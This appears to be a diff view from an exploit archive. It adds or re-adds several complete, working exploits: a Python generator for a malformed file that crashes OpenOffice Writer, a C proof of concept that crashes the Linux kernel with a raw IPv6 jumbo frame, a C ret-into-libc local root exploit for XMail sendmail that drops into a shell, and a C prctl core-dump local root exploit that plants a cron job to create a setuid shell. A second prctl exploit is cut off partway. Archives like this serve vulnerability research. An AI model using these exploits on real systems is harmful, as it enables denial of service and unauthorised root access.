printf("SFN: reclen=%2d off=%d ino=%d, %-12s",
de[0].d_reclen, de[0].d_off, de[0].d_ino, de[0].d_name);
if (de[1].d_reclen)
printf("\tLFN: reclen=%2d off=%d ino=%d, %s",
de[1].d_reclen, de[1].d_off, de[1].d_ino, de[1].d_name);
printf("\n");
}
return 0;
}

91
platforms/linux/dos/30091.py Executable file
View file

@ -0,0 +1,91 @@
source: http://www.securityfocus.com/bid/24186/info
The OpenOffice 'Writer' component is prone to a remote denial-of-service vulnerability.
Successful exploits may allow remote attackers to cause denial-of-service conditions on the webserver running the affected application.
OpenOffice 2.2.0 is vulnerable; other versions may also be affected.
import sys
import time
print "--------------------------------------------------------"
print " OpenOffice.org 2.2.0 Writer Denial of Service "
print " url: http://www.openoffice.org/ "
print " "
print " author: shinnai "
print " mail: shinnai[at]autistici[dot]org "
print " site: http://shinnai.altervista.org "
print " "
print " If you want, you can change the file extension in .doc "
print "--------------------------------------------------------"
exploit = \
"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1\x00\x00\x00\x00\x00\x00\x00\x00"+\
"\x00\x00\x00\x00\x00\x00\x00\x00\x3E\x00\x03\x00\xFE\xFF\x09\x00"+\
"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+\
"\x2A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+\
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"+\
"\xEC\xA5\xC1\x00\x23\x60\x10\x04\x00\x00\xF0\x12\xBF\x00\x00\x00"+\
"\x00\x00\x00\x10\x00\x00\x00\x00\x00\x06\x00\x00\x01\x08\x00\x00"+\
"\x0E\x00\x62\x6A\x62\x6A\x35\x47\x35\x47"
while 1:
print " OPTIONS "
print " 1 -> Create file exploit.otp "
print " 2 -> Quit\n "
print "--------------------------------------------------------"
choice = 0
while 1:
try:
choice = int(raw_input("Make your choice: "))
if choice != 1 and choice != 2:
print "ehm... Invalid choice...\n"
else:
break
except:
print "ehm... Invalid choice...\n"
if choice == 1:
flag = 1
try:
fileOut = open('exploit.otp','w')
fileOut.write(exploit)
fileOut.close()
print "File created!\nBe safe!"
except:
print "Unable to create file."
if choice == 2:
print "Be safe!"
time.sleep(2)
sys.exit()

View file

@ -1,134 +1,134 @@
/*
* Clemens Kurtenbach <ckurtenbach at s21sec . com>
* PoC code for exploiting the jumbo bug found in
* linux kernels >=2.6.20 and <=2.6.21.1
* gcc -O2 ipv6_jumbo_crash.c -o ipv6_jumbo_crash
*
*/
/* io */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/* network */
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <linux/if_arp.h>
#include <netdb.h>
#include <linux/if.h>
#define MY_FRAME_LEN 1145
char *resolve6(unsigned char *target) {
char *ret_addr;
struct in6_addr my_in6;
char *glob_addr = (char *) &my_in6;
struct addrinfo addr_hints, *addr_result;
unsigned char out[64];
memset(&addr_hints, 0, sizeof(addr_hints));
addr_hints.ai_family = AF_INET6;
if (getaddrinfo(target, NULL, &addr_hints, &addr_result) != 0) {
printf("getaddrinfo() error\n");
exit(1);
}
if(getnameinfo(addr_result->ai_addr, addr_result->ai_addrlen, out, sizeof(out), NULL, 0, NI_NUMERICHOST) != 0){
printf("getnameinfo() error\n");
exit(1);
}
if(inet_pton(AF_INET6, out, glob_addr) < 0) {
printf("inet_pton() error\n");
exit(1);
}
if((ret_addr = malloc(16)) == NULL) {
printf("malloc() error\n");
exit(1);
}
memcpy(ret_addr, my_in6.s6_addr, 16);
return ret_addr;
}
int main(int argc, char *argv[]) {
if (argc < 4) {
printf("usage: ./ipv6_jumbo_crash <fe80::1:2:3> <00:11:22:33:44:55> <eth0>\n");
exit(1);
}
/* handle IPv6 destination */
unsigned char *dest_ip = resolve6(argv[1]);
/* handle MAC */
unsigned char dest_mac[7];
sscanf(argv[2], "%x:%x:%x:%x:%x:%x",
(unsigned int*)&dest_mac[0], (unsigned int*)&dest_mac[1],
(unsigned int*)&dest_mac[2], (unsigned int*)&dest_mac[3],
(unsigned int*)&dest_mac[4], (unsigned int*)&dest_mac[5]);
/* handle interface */
unsigned char *iface;
iface = argv[3];
/* buffer for ethernet frame */
void *buffer = (void*)malloc(MY_FRAME_LEN);
/* pointer to ethenet header */
unsigned char *etherhead = buffer;
struct ethhdr *eh = (struct ethhdr *)etherhead;
/* our MAC address */
unsigned char src_mac[6] = { 0x00, 0x11, 0x22, 0x33, 0x44, 0x55 };
unsigned char src_ip[16] = { 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02};
/* prepare socket */
int s;
s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (s < 0) {
printf("cannot create socket: [%d]\n",s);
exit(1);
}
/* RAW communication */
struct sockaddr_ll socket_address;
socket_address.sll_family = PF_PACKET;
socket_address.sll_protocol = htons(ETH_P_IP);
socket_address.sll_ifindex = if_nametoindex(iface);
socket_address.sll_hatype = ARPHRD_ETHER;
socket_address.sll_pkttype = PACKET_OTHERHOST;
socket_address.sll_halen = ETH_ALEN;
/* set the frame header */
memcpy((void*)buffer, (void*)dest_mac, ETH_ALEN);
memcpy((void*)(buffer+ETH_ALEN), (void*)src_mac, ETH_ALEN);
eh->h_proto = 0xdd86; // IPv6
/* the buffer we want to send */
unsigned char bad_buffer[] = {
0x60, 0x3b, 0x50, 0x15, 0x04, 0x08, 0x00, 0xa0, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x43, 0x6e, 0xc2, 0x05, 0x23 };
memcpy((void*)(buffer+14), (void*)bad_buffer, MY_FRAME_LEN);
/* overwrite our src and dst ip */
memcpy((void*)(buffer+22), (void*)src_ip, 16);
memcpy((void*)(buffer+38), dest_ip, 16);
/* send the buffer */
int send_result = 0;
send_result = sendto(s, buffer, MY_FRAME_LEN, 0, (struct sockaddr*)&socket_address, sizeof(socket_address));
if (send_result == -1) {
printf("could not send frame: [%d]\n", send_result);
exit(1);
}
else printf("frame send to ip [%s] with mac [%s] on iface [%s]\n",argv[1],argv[2],argv[3]);
return 0;
}
// milw0rm.com [2008-01-11]
/*
* Clemens Kurtenbach <ckurtenbach at s21sec . com>
* PoC code for exploiting the jumbo bug found in
* linux kernels >=2.6.20 and <=2.6.21.1
* gcc -O2 ipv6_jumbo_crash.c -o ipv6_jumbo_crash
*
*/
/* io */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/* network */
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <linux/if_arp.h>
#include <netdb.h>
#include <linux/if.h>
#define MY_FRAME_LEN 1145
char *resolve6(unsigned char *target) {
char *ret_addr;
struct in6_addr my_in6;
char *glob_addr = (char *) &my_in6;
struct addrinfo addr_hints, *addr_result;
unsigned char out[64];
memset(&addr_hints, 0, sizeof(addr_hints));
addr_hints.ai_family = AF_INET6;
if (getaddrinfo(target, NULL, &addr_hints, &addr_result) != 0) {
printf("getaddrinfo() error\n");
exit(1);
}
if(getnameinfo(addr_result->ai_addr, addr_result->ai_addrlen, out, sizeof(out), NULL, 0, NI_NUMERICHOST) != 0){
printf("getnameinfo() error\n");
exit(1);
}
if(inet_pton(AF_INET6, out, glob_addr) < 0) {
printf("inet_pton() error\n");
exit(1);
}
if((ret_addr = malloc(16)) == NULL) {
printf("malloc() error\n");
exit(1);
}
memcpy(ret_addr, my_in6.s6_addr, 16);
return ret_addr;
}
int main(int argc, char *argv[]) {
if (argc < 4) {
printf("usage: ./ipv6_jumbo_crash <fe80::1:2:3> <00:11:22:33:44:55> <eth0>\n");
exit(1);
}
/* handle IPv6 destination */
unsigned char *dest_ip = resolve6(argv[1]);
/* handle MAC */
unsigned char dest_mac[7];
sscanf(argv[2], "%x:%x:%x:%x:%x:%x",
(unsigned int*)&dest_mac[0], (unsigned int*)&dest_mac[1],
(unsigned int*)&dest_mac[2], (unsigned int*)&dest_mac[3],
(unsigned int*)&dest_mac[4], (unsigned int*)&dest_mac[5]);
/* handle interface */
unsigned char *iface;
iface = argv[3];
/* buffer for ethernet frame */
void *buffer = (void*)malloc(MY_FRAME_LEN);
/* pointer to ethenet header */
unsigned char *etherhead = buffer;
struct ethhdr *eh = (struct ethhdr *)etherhead;
/* our MAC address */
unsigned char src_mac[6] = { 0x00, 0x11, 0x22, 0x33, 0x44, 0x55 };
unsigned char src_ip[16] = { 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02};
/* prepare socket */
int s;
s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (s < 0) {
printf("cannot create socket: [%d]\n",s);
exit(1);
}
/* RAW communication */
struct sockaddr_ll socket_address;
socket_address.sll_family = PF_PACKET;
socket_address.sll_protocol = htons(ETH_P_IP);
socket_address.sll_ifindex = if_nametoindex(iface);
socket_address.sll_hatype = ARPHRD_ETHER;
socket_address.sll_pkttype = PACKET_OTHERHOST;
socket_address.sll_halen = ETH_ALEN;
/* set the frame header */
memcpy((void*)buffer, (void*)dest_mac, ETH_ALEN);
memcpy((void*)(buffer+ETH_ALEN), (void*)src_mac, ETH_ALEN);
eh->h_proto = 0xdd86; // IPv6
/* the buffer we want to send */
unsigned char bad_buffer[] = {
0x60, 0x3b, 0x50, 0x15, 0x04, 0x08, 0x00, 0xa0, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x43, 0x6e, 0xc2, 0x05, 0x23 };
memcpy((void*)(buffer+14), (void*)bad_buffer, MY_FRAME_LEN);
/* overwrite our src and dst ip */
memcpy((void*)(buffer+22), (void*)src_ip, 16);
memcpy((void*)(buffer+38), dest_ip, 16);
/* send the buffer */
int send_result = 0;
send_result = sendto(s, buffer, MY_FRAME_LEN, 0, (struct sockaddr*)&socket_address, sizeof(socket_address));
if (send_result == -1) {
printf("could not send frame: [%d]\n", send_result);
exit(1);
}
else printf("frame send to ip [%s] with mac [%s] on iface [%s]\n",argv[1],argv[2],argv[3]);
return 0;
}
// milw0rm.com [2008-01-11]

View file

@ -1,251 +1,251 @@
/*
* XMail 1.21 'sendmail' local exploit (ret-into-libc)
* Yields uid root || gid mail
* By qaaz [at] centrum [dot] cz, 2005
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/select.h>
#define TARGET "/var/MailRoot/bin/sendmail"
#define NM "nm"
#define GREP "grep"
#define MKDIR "mkdir"
#define TMP "/tmp"
#define MAILROOT TMP"/mr"
#define ID "/usr/bin/id"
#define SH "/bin/sh"
#define OVERLEN (256+12 + 16)
/* EmitRecipients() stack */
/* | locals + padding + PUSHes | RET | Arg1... | */
/* |<--------- OVERLEN ------->| */
#define MAX(x,y) (((x)>(y)) ? (x) : (y))
char *libc_file = NULL;
unsigned int libc_base = 0;
unsigned int stack_base = 0;
unsigned int file_addr = 0;
unsigned int system_addr = 0;
int pid;
int pi[2], po[2], pe[2];
void sigchild(int sig)
{
if (waitpid(pid, NULL, WNOHANG) == pid) {
printf("[*] Vuln terminated\n");
exit(-1);
}
}
void killchild()
{
if (pid) kill(pid, SIGKILL);
}
char bad_chars(char *buf, int len)
{
int i;
if (len == 0) len == strlen(buf);
for (i = 0; i < len; i++) {
if (!buf[i] || strchr("<> \t,\":;'\r\n", buf[i]))
return buf[i];
}
return 0;
}
unsigned int get_sym(char *lib, char *sym)
{
FILE *f;
char buf[1024];
unsigned int val = 0;
sprintf(buf, "%s -D %s | %s -w %s", NM, lib, GREP, sym);
if (f = popen(buf, "r")) {
fgets(buf, sizeof(buf), f);
sscanf(buf, "%08lx %*s %*s", &val);
pclose(f);
}
return val;
}
unsigned int check_sym(char *lib, char *sym, unsigned int base)
{
unsigned int offs = get_sym(lib, sym);
unsigned int addr = base + offs;
if (!offs) {
printf("[-] %s: not found?\n", sym);
return 0;
}
if (bad_chars((char *) &addr, 4)) {
printf("[-] %s: 0x%08x, bad chars\n", sym, addr);
return 0;
}
printf("[+] %s: 0x%08x\n", sym, addr);
return addr;
}
void do_maps(int pid)
{
FILE *f;
char buf[1024];
sprintf(buf, "/proc/%d/maps", pid);
if (!(f = fopen(buf, "r"))) return;
while (fgets(buf, sizeof(buf), f)) {
unsigned int addr_beg, addr_end;
char pathname[1024];
int offset;
pathname[0] = 0;
sscanf(buf, "%08lx-%08lx %*s %08lx %*s %*s %s",
&addr_beg, &addr_end, &offset, pathname);
if (offset < 0)
stack_base = addr_end;
else if (strstr(pathname, "/libc") && (!libc_base || addr_beg < libc_base))
libc_base = addr_beg, libc_file = (char *) strdup(pathname);
}
fclose(f);
}
void do_syms()
{
if (!(file_addr = check_sym(libc_file, "stdout", libc_base))
&& !(file_addr = check_sym(libc_file, "stderr", libc_base))
&& !(file_addr = check_sym(libc_file, "stdin", libc_base))) {
printf("[-] Can't use std files\n");
exit(-1);
}
if (!(system_addr = check_sym(libc_file, "system", libc_base))) {
printf("[-] Can't use system()\n");
exit(-1);
}
}
void do_shell()
{
fd_set fds;
struct timeval tv;
int retval, maxfd;
char buf[1024];
maxfd = MAX(0, MAX(po[0], pe[0])) + 1;
while (1) {
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(po[0], &fds);
FD_SET(pe[0], &fds);
tv.tv_sec = 0;
tv.tv_usec = 100;
if (select(maxfd, &fds, NULL, NULL, &tv) == -1) break;
if (FD_ISSET(0, &fds)) {
if ((retval = read(0, buf, sizeof(buf))) <= 0) break;
write(pi[1], buf, retval);
}
if (FD_ISSET(po[0], &fds)) {
if ((retval = read(po[0], buf, sizeof(buf))) <= 0) break;
write(1, buf, retval);
}
if (FD_ISSET(pe[0], &fds)) {
if ((retval = read(pe[0], buf, sizeof(buf))) <= 0) break;
write(2, buf, retval);
}
}
}
int main(int argc, char *argv[])
{
if (argc > 1 && !strcmp(argv[1], "-sh")) {
setresuid(geteuid(), geteuid(), geteuid());
setresgid(getegid(), getegid(), getegid());
system(ID);
execl(SH, SH, "-i", NULL);
perror("execl");
exit(-1);
}
if (pipe(pi) || pipe(po) || pipe(pe)) {
perror("[-] pipe");
return -1;
}
if ((pid = fork()) == -1) {
perror("[-] fork");
return -1;
}
if (pid) {
unsigned int i;
char buf[10*1024];
atexit(killchild);
signal(SIGCHLD, sigchild);
sleep(1);
printf("[*] Reading maps...\n");
do_maps(pid);
printf("[%c] libc: 0x%08x\n", libc_base?'+':'-', libc_base);
if (!libc_base) exit(-1);
printf("[%c] stack: 0x%08x\n", stack_base?'+':'-', stack_base);
if (!stack_base) exit(-1);
printf("[*] Getting symbols...\n");
do_syms();
strcpy(buf, "To: h4h4@");
for (i = 0; i < OVERLEN-5; i++) // "h4h4@" == 5
strcat(buf, "A");
strncat(buf, (char *) &system_addr, 4);
strncat(buf, (char *) &file_addr, 4);
i = stack_base - 5000;
strncat(buf, (char *) &i, 4);
strcat(buf, "\n");
write(pi[1], buf, strlen(buf));
sleep(1); do_shell();
printf("[*] Done\n");
exit(1);
}
else {
char buf[10*1024];
char *_env[3] = { NULL, "MAIL_ROOT="MAILROOT, NULL };
char *_arg[3] = { TARGET, "-t", NULL };
sprintf(buf, "%s -p %s/spool/temp", MKDIR, MAILROOT);
system(buf);
sprintf(buf, "%10000s -sh", argv[0]);
_env[0] = (char *) strdup(buf);
printf("[*] Executing vuln...\n");
close(0); dup2(pi[0], 0);
close(1); dup2(po[1], 1);
close(2); dup2(pe[1], 2);
execve(_arg[0], _arg, _env);
perror("[-] execve");
return -1;
}
exit(1);
}
// milw0rm.com [2005-10-20]
/*
* XMail 1.21 'sendmail' local exploit (ret-into-libc)
* Yields uid root || gid mail
* By qaaz [at] centrum [dot] cz, 2005
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/select.h>
#define TARGET "/var/MailRoot/bin/sendmail"
#define NM "nm"
#define GREP "grep"
#define MKDIR "mkdir"
#define TMP "/tmp"
#define MAILROOT TMP"/mr"
#define ID "/usr/bin/id"
#define SH "/bin/sh"
#define OVERLEN (256+12 + 16)
/* EmitRecipients() stack */
/* | locals + padding + PUSHes | RET | Arg1... | */
/* |<--------- OVERLEN ------->| */
#define MAX(x,y) (((x)>(y)) ? (x) : (y))
char *libc_file = NULL;
unsigned int libc_base = 0;
unsigned int stack_base = 0;
unsigned int file_addr = 0;
unsigned int system_addr = 0;
int pid;
int pi[2], po[2], pe[2];
void sigchild(int sig)
{
if (waitpid(pid, NULL, WNOHANG) == pid) {
printf("[*] Vuln terminated\n");
exit(-1);
}
}
void killchild()
{
if (pid) kill(pid, SIGKILL);
}
char bad_chars(char *buf, int len)
{
int i;
if (len == 0) len == strlen(buf);
for (i = 0; i < len; i++) {
if (!buf[i] || strchr("<> \t,\":;'\r\n", buf[i]))
return buf[i];
}
return 0;
}
unsigned int get_sym(char *lib, char *sym)
{
FILE *f;
char buf[1024];
unsigned int val = 0;
sprintf(buf, "%s -D %s | %s -w %s", NM, lib, GREP, sym);
if (f = popen(buf, "r")) {
fgets(buf, sizeof(buf), f);
sscanf(buf, "%08lx %*s %*s", &val);
pclose(f);
}
return val;
}
unsigned int check_sym(char *lib, char *sym, unsigned int base)
{
unsigned int offs = get_sym(lib, sym);
unsigned int addr = base + offs;
if (!offs) {
printf("[-] %s: not found?\n", sym);
return 0;
}
if (bad_chars((char *) &addr, 4)) {
printf("[-] %s: 0x%08x, bad chars\n", sym, addr);
return 0;
}
printf("[+] %s: 0x%08x\n", sym, addr);
return addr;
}
void do_maps(int pid)
{
FILE *f;
char buf[1024];
sprintf(buf, "/proc/%d/maps", pid);
if (!(f = fopen(buf, "r"))) return;
while (fgets(buf, sizeof(buf), f)) {
unsigned int addr_beg, addr_end;
char pathname[1024];
int offset;
pathname[0] = 0;
sscanf(buf, "%08lx-%08lx %*s %08lx %*s %*s %s",
&addr_beg, &addr_end, &offset, pathname);
if (offset < 0)
stack_base = addr_end;
else if (strstr(pathname, "/libc") && (!libc_base || addr_beg < libc_base))
libc_base = addr_beg, libc_file = (char *) strdup(pathname);
}
fclose(f);
}
void do_syms()
{
if (!(file_addr = check_sym(libc_file, "stdout", libc_base))
&& !(file_addr = check_sym(libc_file, "stderr", libc_base))
&& !(file_addr = check_sym(libc_file, "stdin", libc_base))) {
printf("[-] Can't use std files\n");
exit(-1);
}
if (!(system_addr = check_sym(libc_file, "system", libc_base))) {
printf("[-] Can't use system()\n");
exit(-1);
}
}
void do_shell()
{
fd_set fds;
struct timeval tv;
int retval, maxfd;
char buf[1024];
maxfd = MAX(0, MAX(po[0], pe[0])) + 1;
while (1) {
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(po[0], &fds);
FD_SET(pe[0], &fds);
tv.tv_sec = 0;
tv.tv_usec = 100;
if (select(maxfd, &fds, NULL, NULL, &tv) == -1) break;
if (FD_ISSET(0, &fds)) {
if ((retval = read(0, buf, sizeof(buf))) <= 0) break;
write(pi[1], buf, retval);
}
if (FD_ISSET(po[0], &fds)) {
if ((retval = read(po[0], buf, sizeof(buf))) <= 0) break;
write(1, buf, retval);
}
if (FD_ISSET(pe[0], &fds)) {
if ((retval = read(pe[0], buf, sizeof(buf))) <= 0) break;
write(2, buf, retval);
}
}
}
int main(int argc, char *argv[])
{
if (argc > 1 && !strcmp(argv[1], "-sh")) {
setresuid(geteuid(), geteuid(), geteuid());
setresgid(getegid(), getegid(), getegid());
system(ID);
execl(SH, SH, "-i", NULL);
perror("execl");
exit(-1);
}
if (pipe(pi) || pipe(po) || pipe(pe)) {
perror("[-] pipe");
return -1;
}
if ((pid = fork()) == -1) {
perror("[-] fork");
return -1;
}
if (pid) {
unsigned int i;
char buf[10*1024];
atexit(killchild);
signal(SIGCHLD, sigchild);
sleep(1);
printf("[*] Reading maps...\n");
do_maps(pid);
printf("[%c] libc: 0x%08x\n", libc_base?'+':'-', libc_base);
if (!libc_base) exit(-1);
printf("[%c] stack: 0x%08x\n", stack_base?'+':'-', stack_base);
if (!stack_base) exit(-1);
printf("[*] Getting symbols...\n");
do_syms();
strcpy(buf, "To: h4h4@");
for (i = 0; i < OVERLEN-5; i++) // "h4h4@" == 5
strcat(buf, "A");
strncat(buf, (char *) &system_addr, 4);
strncat(buf, (char *) &file_addr, 4);
i = stack_base - 5000;
strncat(buf, (char *) &i, 4);
strcat(buf, "\n");
write(pi[1], buf, strlen(buf));
sleep(1); do_shell();
printf("[*] Done\n");
exit(1);
}
else {
char buf[10*1024];
char *_env[3] = { NULL, "MAIL_ROOT="MAILROOT, NULL };
char *_arg[3] = { TARGET, "-t", NULL };
sprintf(buf, "%s -p %s/spool/temp", MKDIR, MAILROOT);
system(buf);
sprintf(buf, "%10000s -sh", argv[0]);
_env[0] = (char *) strdup(buf);
printf("[*] Executing vuln...\n");
close(0); dup2(pi[0], 0);
close(1); dup2(po[1], 1);
close(2); dup2(pe[1], 2);
execve(_arg[0], _arg, _env);
perror("[-] execve");
return -1;
}
exit(1);
}
// milw0rm.com [2005-10-20]

View file

@ -44,6 +44,6 @@ int main (int argc, char ** argv)
memcpy((char *)out+63, shellcode, strlen(shellcode));
execl (BIN, BIN, "-xsokdir", out, 0x0);
}
// milw0rm.com [2004-01-02]
}
// milw0rm.com [2004-01-02]

View file

@ -1,52 +1,52 @@
/*****************************************************/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer <luna@aditel.org> (main PoC code) */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("[ 10.Jul.2006 ]\n\n");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf("[*] Creating Cron entry\n");
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
sleep(62);
printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
system("/tmp/sh -i");
}
// milw0rm.com [2006-07-11]
/*****************************************************/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer <luna@aditel.org> (main PoC code) */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("[ 10.Jul.2006 ]\n\n");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf("[*] Creating Cron entry\n");
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
sleep(62);
printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
system("/tmp/sh -i");
}
// milw0rm.com [2006-07-11]

View file

@ -1,127 +1,127 @@
/* Linux >= 2.6.13 prctl kernel exploit
*
* (C) Julien TINNES
*
* If you read the Changelog from 2.6.13 you've probably seen:
* [PATCH] setuid core dump
*
* This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process,
* user setable argument to PR_SET_DUMPABLE.
*
* This flaw allows us to create a root owned coredump into any directory.
* This is trivially exploitable.
*
*/
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/prctl.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <signal.h>
#include <stdlib.h>
#include <time.h>
#define CROND "/etc/cron.d"
#define BUFSIZE 2048
struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};
char crontemplate[]=
